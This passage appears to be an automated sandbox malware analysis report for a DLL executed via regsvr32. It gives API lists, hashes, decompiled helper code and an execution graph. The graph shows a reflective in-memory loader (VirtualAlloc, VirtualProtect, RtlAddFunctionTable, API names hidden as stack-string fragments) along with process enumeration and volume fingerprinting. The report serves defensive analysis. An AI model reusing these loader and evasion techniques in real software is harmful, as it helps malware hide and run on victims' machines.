                                                                                                                                                                                                                    0x18000e13a
                                                                                                                                                                                                                    0x18000e145
                                                                                                                                                                                                                    0x18000e147
                                                                                                                                                                                                                    0x18000e14d
                                                                                                                                                                                                                    0x18000e153
                                                                                                                                                                                                                    0x18000e158
                                                                                                                                                                                                                    0x18000e16e
                                                                                                                                                                                                                    0x18000e170
                                                                                                                                                                                                                    0x18000e175
                                                                                                                                                                                                                    0x18000e17a
                                                                                                                                                                                                                    0x18000e17c
                                                                                                                                                                                                                    0x18000e180
                                                                                                                                                                                                                    0x18000e187
                                                                                                                                                                                                                    0x18000e18b
                                                                                                                                                                                                                    0x18000e18e
                                                                                                                                                                                                                    0x18000e196
                                                                                                                                                                                                                    0x18000e199
                                                                                                                                                                                                                    0x18000e19e
                                                                                                                                                                                                                    0x18000e1ad
                                                                                                                                                                                                                    0x18000e1b2
                                                                                                                                                                                                                    0x18000e1b4
                                                                                                                                                                                                                    0x18000e1b8
                                                                                                                                                                                                                    0x18000e1bc
                                                                                                                                                                                                                    0x18000e1c3
                                                                                                                                                                                                                    0x18000e1c7
                                                                                                                                                                                                                    0x18000e1d1
                                                                                                                                                                                                                    0x18000e1e5

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000DFFC
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000E087
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 953036326-0
                                                                                                                                                                                                                    • Opcode ID: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                                                                                                                                                    • Instruction ID: 0d257abc0b638f0f040665fb3b769d735b9bc0d803a768daaeded027fae08968
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7291B13261469885F7A2CF6598403ED3BA0F749BC8F14C11AFE4A67A95DF74C68AC710
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 000000018000DC50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 29%
                                                                                                                                                                                                                    			E0000000118000DC50(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				void* _t91;
				void* _t97;
				void* _t99;
				void* _t102;
				void* _t103;

				_a8 = __rbx;
				_a24 = __rbp;
				E0000000118000F880(0x1470, __rax, _t97, _t99);
				_t62 =  *0x80021010; // 0xaaf8a09cc6d2
				_a5176 = _t62 ^ _t91 - __rax;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t103 = _t102 + __r8;
				 *((long long*)(__rcx)) =  *((intOrPtr*)(0x800227f0 + (__edx >> 6) * 8));
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t103 >= 0) goto 0x8000dd91;
				_t67 =  &_a40;
				if (__r8 - _t103 >= 0) goto 0x8000dcfa;
				_t41 =  *__r8 & 0x0000ffff;
				if (_t41 != 0xa) goto 0x8000dce6;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x8000dcc8;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E0000000118000A154();
				if (0 == 0) goto 0x8000dd89;
				if (0 == 0) goto 0x8000dd79;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000dd89;
				if (0 + _a24 < 0) goto 0x8000dd46;
				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
				goto 0x8000dcbd;
				 *((intOrPtr*)(__rcx)) = GetLastError();
				return E000000011800010B0(_t39, 0, _a5176 ^ _t91 - __rax);
			}














                                                                                                                                                                                                                    0x18000dc50
                                                                                                                                                                                                                    0x18000dc55
                                                                                                                                                                                                                    0x18000dc67
                                                                                                                                                                                                                    0x18000dc6f
                                                                                                                                                                                                                    0x18000dc79
                                                                                                                                                                                                                    0x18000dc8a
                                                                                                                                                                                                                    0x18000dc98
                                                                                                                                                                                                                    0x18000dc9c
                                                                                                                                                                                                                    0x18000dcb4
                                                                                                                                                                                                                    0x18000dcba
                                                                                                                                                                                                                    0x18000dcbd
                                                                                                                                                                                                                    0x18000dcc3
                                                                                                                                                                                                                    0x18000dccb
                                                                                                                                                                                                                    0x18000dccd
                                                                                                                                                                                                                    0x18000dcd8
                                                                                                                                                                                                                    0x18000dcdf
                                                                                                                                                                                                                    0x18000dce2
                                                                                                                                                                                                                    0x18000dce6
                                                                                                                                                                                                                    0x18000dcf8
                                                                                                                                                                                                                    0x18000dcfa
                                                                                                                                                                                                                    0x18000dd05
                                                                                                                                                                                                                    0x18000dd13
                                                                                                                                                                                                                    0x18000dd26
                                                                                                                                                                                                                    0x18000dd2b
                                                                                                                                                                                                                    0x18000dd35
                                                                                                                                                                                                                    0x18000dd3e
                                                                                                                                                                                                                    0x18000dd44
                                                                                                                                                                                                                    0x18000dd46
                                                                                                                                                                                                                    0x18000dd5b
                                                                                                                                                                                                                    0x18000dd64
                                                                                                                                                                                                                    0x18000dd6f
                                                                                                                                                                                                                    0x18000dd77
                                                                                                                                                                                                                    0x18000dd7e
                                                                                                                                                                                                                    0x18000dd84
                                                                                                                                                                                                                    0x18000dd8f
                                                                                                                                                                                                                    0x18000ddbf

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                                    • API String ID: 442123175-4171548499
                                                                                                                                                                                                                    • Opcode ID: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                                                                                                                                                    • Instruction ID: c34ad0e7ff2d66e96fda8e7ac49a4eca9b2c2d7f4ff30b46897494357c1f583c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E441A472614A8886EBA2CF25E4447EA7761F79C7D4F408022EE4E87758DF7CC645C750
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180004A60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                    • Opcode ID: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                                                                                                                                                    • Instruction ID: 9822ff17b0ce5fbc637df8732c669b6e85e1acb8a855211156653d926a5084e0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D114C72614B4482EBA28F25F440399B7A0F788BD4F188220EE8C0B769DF38CA55CB04
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00000001800109D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassCursorLoadRegister
                                                                                                                                                                                                                    • String ID: P
                                                                                                                                                                                                                    • API String ID: 1693014935-3110715001
                                                                                                                                                                                                                    • Opcode ID: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                                                                                                                                                    • Instruction ID: c953b54a92ac3cc4e92e902e3110dd604cc2aeb839ef1ea803bcd24b7a7bdda6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8501B232519F8486E7A18F00F89834BB7B4F388788F604119E6CD42B68DFBDC258CB40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:17%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                    Total number of Nodes:42
                                                                                                                                                                                                                    Total number of Limit Nodes:4
                                                                                                                                                                                                                    execution_graph 3044 92a7f0 3045 92a80b 3044->3045 3047 92a8bc 3045->3047 3048 93020c 3045->3048 3050 93022b 3048->3050 3051 930590 3050->3051 3052 93e310 3050->3052 3051->3047 3054 93e423 3052->3054 3053 93e5f6 3053->3050 3054->3053 3056 9240a0 3054->3056 3058 924116 3056->3058 3057 9241ca GetVolumeInformationW 3057->3053 3058->3057 3083 942ab0 3084 942aea 3083->3084 3085 942c51 3084->3085 3086 93e9e8 Process32FirstW 3084->3086 3086->3084 3076 94488c 3078 9448d6 3076->3078 3079 944914 3078->3079 3080 93e9e8 3078->3080 3081 928bc8 Process32FirstW 3080->3081 3082 93eab4 3081->3082 3082->3078 3059 93e9e8 3062 928bc8 3059->3062 3061 93eab4 3064 928c02 3062->3064 3063 928eb8 3063->3061 3064->3063 3065 928d6f Process32FirstW 3064->3065 3065->3064 3066 8e0000 3069 8e015a 3066->3069 3067 8e033f GetNativeSystemInfo 3068 8e0377 VirtualAlloc 3067->3068 3075 8e08eb 3067->3075 3070 8e0395 VirtualAlloc 3068->3070 3072 8e03aa 3068->3072 3069->3067 3069->3075 3070->3072 3071 8e0873 3073 8e08c6 RtlAddFunctionTable 3071->3073 3071->3075 3072->3071 3074 8e084b VirtualProtect 3072->3074 3073->3075 3074->3072 3087 9280cc 3089 9280f3 3087->3089 3088 9282ba 3089->3088 3090 93e9e8 Process32FirstW 3089->3090 3090->3089

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 008E0000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 0 8e0000-8e029a call 8e091c * 2 13 8e0905 0->13 14 8e02a0-8e02a4 0->14 15 8e0907-8e091a 13->15 14->13 16 8e02aa-8e02ae 14->16 16->13 17 8e02b4-8e02b8 16->17 17->13 18 8e02be-8e02c5 17->18 18->13 19 8e02cb-8e02dc 18->19 19->13 20 8e02e2-8e02eb 19->20 20->13 21 8e02f1-8e02fc 20->21 21->13 22 8e0302-8e0312 21->22 23 8e033f-8e0371 GetNativeSystemInfo 22->23 24 8e0314-8e031a 22->24 23->13 26 8e0377-8e0393 VirtualAlloc 23->26 25 8e031c-8e0324 24->25 27 8e032c-8e032d 25->27 28 8e0326-8e032a 25->28 29 8e03aa-8e03ae 26->29 30 8e0395-8e03a8 VirtualAlloc 26->30 31 8e032f-8e033d 27->31 28->31 32 8e03dc-8e03e3 29->32 33 8e03b0-8e03c2 29->33 30->29 31->23 31->25 34 8e03fb-8e0417 32->34 35 8e03e5-8e03f9 32->35 36 8e03d4-8e03d8 33->36 39 8e0458-8e0465 34->39 40 8e0419-8e041a 34->40 35->34 35->35 37 8e03da 36->37 38 8e03c4-8e03d1 36->38 37->34 38->36 42 8e046b-8e0472 39->42 43 8e0537-8e0542 39->43 41 8e041c-8e0422 40->41 44 8e0448-8e0456 41->44 45 8e0424-8e0446 41->45 42->43 48 8e0478-8e0485 42->48 46 8e0548-8e0559 43->46 47 8e06e6-8e06ed 43->47 44->39 44->41 45->44 45->45 49 8e0562-8e0565 46->49 51 8e07ac-8e07c3 47->51 52 8e06f3-8e0707 47->52 48->43 50 8e048b-8e048f 48->50 55 8e055b-8e055f 49->55 56 8e0567-8e0574 49->56 57 8e051b-8e0525 50->57 53 8e087a-8e088d 51->53 54 8e07c9-8e07cd 51->54 58 8e070d 52->58 59 8e07a9-8e07aa 52->59 77 8e088f-8e089a 53->77 78 8e08b3-8e08ba 53->78 60 8e07d0-8e07d3 54->60 55->49 63 8e060d-8e0619 56->63 64 8e057a-8e057d 56->64 61 8e052b-8e0531 57->61 62 8e0494-8e04a8 57->62 65 8e0712-8e0736 58->65 59->51 67 8e085f-8e086d 60->67 68 8e07d9-8e07e9 60->68 61->43 61->50 71 8e04cf-8e04d3 62->71 72 8e04aa-8e04cd 62->72 69 8e061f 63->69 70 8e06e2-8e06e3 63->70 64->63 73 8e0583-8e059b 64->73 90 8e0738-8e073e 65->90 91 8e0796-8e079f 65->91 67->60 83 8e0873-8e0874 67->83 80 8e080d-8e080f 68->80 81 8e07eb-8e07ed 68->81 82 8e0625-8e0648 69->82 70->47 74 8e04d5-8e04e1 71->74 75 8e04e3-8e04e7 71->75 84 8e0518-8e0519 72->84 73->63 76 8e059d-8e059e 73->76 85 8e0511-8e0515 74->85 87 8e04fe-8e0502 75->87 88 8e04e9-8e04fc 75->88 86 8e05a0-8e0605 76->86 89 8e08ab-8e08b1 77->89 94 8e08bc-8e08c4 78->94 95 8e08eb-8e0903 78->95 96 8e0822-8e082b 80->96 97 8e0811-8e0820 80->97 92 8e07ef-8e07f9 81->92 93 8e07fb-8e080b 81->93 110 8e064a-8e064b 82->110 111 8e06b2-8e06b7 82->111 83->53 84->57 85->84 86->86 100 8e0607 86->100 87->84 98 8e0504-8e050e 87->98 88->85 89->78 103 8e089c-8e08a8 89->103 101 8e0748-8e0754 90->101 102 8e0740-8e0746 90->102 91->65 106 8e07a5-8e07a6 91->106 99 8e082e-8e083d 92->99 93->99 94->95 105 8e08c6-8e08e9 RtlAddFunctionTable 94->105 95->15 96->99 97->99 98->85 112 8e083f-8e0845 99->112 113 8e084b-8e085c VirtualProtect 99->113 100->63 108 8e0756-8e0757 101->108 109 8e0764-8e0776 101->109 107 8e077b-8e078d 102->107 103->89 105->95 106->59 107->91 126 8e078f-8e0794 107->126 118 8e0759-8e0762 108->118 109->107 119 8e064e-8e0651 110->119 115 8e06ce-8e06d8 111->115 116 8e06b9-8e06bd 111->116 112->113 113->67 115->82 121 8e06de-8e06df 115->121 116->115 120 8e06bf-8e06c3 116->120 118->109 118->118 123 8e065b-8e0666 119->123 124 8e0653-8e0659 119->124 120->115 125 8e06c5 120->125 121->70 128 8e0668-8e0669 123->128 129 8e0676-8e0688 123->129 127 8e068d-8e06a3 124->127 125->115 126->90 132 8e06ac 127->132 133 8e06a5-8e06aa 127->133 130 8e066b-8e0674 128->130 129->127 130->129 130->130 132->111 133->119
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000D.00000002.559954174.00000000008E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_8e0000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                                                                                                    • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                                                                                                                                    • API String ID: 394283112-3605381585
                                                                                                                                                                                                                    • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                                                                                                                                    • Instruction ID: fdd78a6bbdcbfa056b2778b5404afeafa957315214cbee5c552c760ebb604fe5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14520430618B888BC719DF19D8857BAB7E0FB55305F144A2DE88BC7251DB74E982CF86
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 009240A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 345 9240a0-924136 call 939f38 348 9241ca-924202 GetVolumeInformationW 345->348 349 92413c-9241c4 call 92a940 345->349 349->348
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetVolumeInformationW.KERNELBASE ref: 009241EB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000D.00000002.560329835.0000000000921000.00000020.00001000.00020000.00000000.sdmp, Offset: 00921000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_921000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InformationVolume
                                                                                                                                                                                                                    • String ID: Ql$v[
                                                                                                                                                                                                                    • API String ID: 2039140958-138011117
                                                                                                                                                                                                                    • Opcode ID: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
                                                                                                                                                                                                                    • Instruction ID: 603b9de3e9c45b5131015bbfdabe88ab1f26b4b816cb91fe14923fabcf4d049e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0731397051CB848BD7B8DF18D48579AB7E0FB88315F60895DE88CC7295CF789888CB42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%